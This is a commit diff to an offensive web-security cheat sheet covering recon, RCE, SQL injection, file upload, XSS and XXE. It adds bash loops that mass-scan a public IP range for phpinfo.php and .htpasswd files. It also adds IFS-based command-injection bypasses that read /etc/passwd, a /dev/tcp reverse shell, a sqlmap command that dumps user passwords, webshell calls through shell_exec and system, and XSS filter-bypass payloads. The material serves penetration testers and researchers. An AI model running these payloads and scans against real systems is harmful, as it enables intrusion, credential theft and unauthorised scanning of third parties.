Methodo, SQL,RCE,XSS,XXE updated

Methodology_and_enumeration.md

@@ -3,6 +3,12 @@
 ## Bug Hunting Methodology
 * Enumerate all subdomains (only if the scope is *.domain.ext)
 
+Using Subbrute
+```
+python subbrute.py domain.example.com
+```
+
+
 Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS"
 ```
 git clone https://github.com/guelfoweb/knock
@@ -11,6 +17,13 @@ git clone https://github.com/danielmiessler/SecLists.git
 knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt
 ```
 
+Using Google Dorks
+```
+site:*.domain.com -www
+site:http://domain.com ext:php
+site:http://domain.com filetype:pdf
+```
+
 Using Jason Haddix's enumall Recon-ng script, 
 ```
 git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
@@ -58,7 +71,9 @@ sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
 • -T4 defines the timing for the task (options are 0-5 and higher is faster)
 ```
 
-* List all the subdirectories with DirBuster or GoBuster
+* List all the subdirectories and files 
+
+Using DirBuster or GoBuster
 ```
 ./gobuster -u http://buffered.io/ -w words.txt -t 10
 -u url
@@ -67,15 +82,40 @@ sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
 
 More subdomain :
 ./gobuster -m dns -w subdomains.txt -u google.com -i
+
+gobuster -w wordlist -u URL -r -e
 ```
 
-* Explore the website
+Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
+```
+#!/bin/bash
+for ipa in 98.13{6..9}.{0..255}.{0..255}; do
+wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
+```
+
+Using a script to detect all .htpasswd files in a range of IPs
+```
+#!/bin/bash
+for ipa in 98.13{6..9}.{0..255}.{0..255}; do
+wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
+```
+
+* Explore the website with a proxy (ZAP/Burp Suite)
 ```
  - Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories
  - Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
  - Explore and understand available functionality, noting areas that correspond to vulnerability types
 ```
 
+* Look for Web Vulns
+```
+- SQLi
+- XSS
+- RCE
+- LFI/RFI
+etc
+```
+
 * Look for private information in GitHub repos with GitRob
 ```
 git clone https://github.com/michenriksen/gitrob.git
@@ -86,31 +126,5 @@ gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.
 
 * Launch a Nikto scan in case you missed something
 
-
-## Google Dorks
-
-Google Dork to find subdomains
-```
-site:*.domain.com -www
-site:http://domain.com ext:php
-site:http://domain.com filetype:pdf
-```
-
-## Scripts
-Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
-```
-#!/bin/bash
-for ipa in 98.13{6..9}.{0..255}.{0..255}; do
-wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
-```
-
-Script to detect all .htpasswd files in a range of IPs
-```
-#!/bin/bash
-for ipa in 98.13{6..9}.{0..255}.{0..255}; do
-wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
-```
-
-
 ## Thanks to
 * http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/

Remote commands execution/README.md

@@ -33,6 +33,11 @@ swissky@crashlab▸ ~ ▸ $ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
 RCE
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+
+swissky@crashlab▸ ~ ▸ $ X=$'uname\x20-a'&&$X
+Linux crashlab 4.4.X-XX-generic #72-Ubuntu
+
+swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
 ```
 
 NodeJS Code execution

SQL injection/README.md

@@ -27,7 +27,7 @@ transformed into U+0027 APOSTROPHE (')
 ## SQL injection using SQLmap
 Basic arguments for SQLmap
 ```
-sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
+sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
 ```
 
 Custom injection in UserAgent/Header/Referer/Cookie

Upload insecure files/README.md

@@ -9,7 +9,6 @@ Reverse Shell
 Touch command
 ```
 
-
 PHP Extension
 ```
 .php
@@ -25,7 +24,6 @@ Double extension
 .png.php
 ```
 
-
 PNG Bypass a resize - Upload the picture and use a local file inclusion
 ```
 You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
@@ -33,7 +31,6 @@ curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
 curl 'http://localhost/test.php?0=system' --data "1='ls'"
 ```
 
-
 JPG Bypass a resize - Upload the picture and use a local file inclusion
 ```
 http://localhost/test.php?c=ls

XSS injection/README.md

@@ -163,6 +163,13 @@ XSS in SWF
 Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
 IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
 IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
+
+
+InsecureFlashFile.swf
+location to url: InsecureFlashFile.swf?a=location&c=http://www.google.com/
+open url to new window: InsecureFlashFile.swf?a=open&c=http://www.google.com/
+http request to url: InsecureFlashFile.swf?a=get&c=http://www.google.com/
+eval js codz: InsecureFlashFile.swf?a=eval&c=alert(document.domain)
 ```
 
 more payloads in ./files
@@ -260,7 +267,6 @@ Bypass parenthesis for string - Firefox
 alert`1`
 ```
 
-
 Bypass onxxxx= blacklist
 ```
 <object onafterscriptexecute=confirm(0)>
@@ -288,7 +294,7 @@ Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
 <img src='1' onerror='alert(0)' <
 ```
 
-Bypass using an alternate way to execute js
+Bypass using an alternate way to execute an alert
 ```
 <script>window['alert'](0)</script>
 <script>parent['alert'](1)</script>
@@ -296,6 +302,25 @@ Bypass using an alternate way to execute js
 <script>top['alert'](3)</script>
 ```
 
+Bypass ';' using another character
+```
+'te' * alert('*') * 'xt';
+'te' / alert('/') / 'xt';
+'te' % alert('%') % 'xt';
+'te' - alert('-') - 'xt';
+'te' + alert('+') + 'xt';
+'te' ^ alert('^') ^ 'xt';
+'te' > alert('>') > 'xt';
+'te' < alert('<') < 'xt';
+'te' == alert('==') == 'xt';
+'te' & alert('&') & 'xt';
+'te' , alert(',') , 'xt';
+'te' | alert('|') | 'xt';
+'te' ? alert('ifelsesh') : 'xt';
+'te' in alert('in') in 'xt';
+'te' instanceof alert('instanceof') instanceof 'xt';
+```
+
 Bypass using Unicode
 ```
 Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was

XXE injections/README.md

@@ -82,4 +82,5 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
 
 
 ## Thanks to
-* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
+* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
+* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html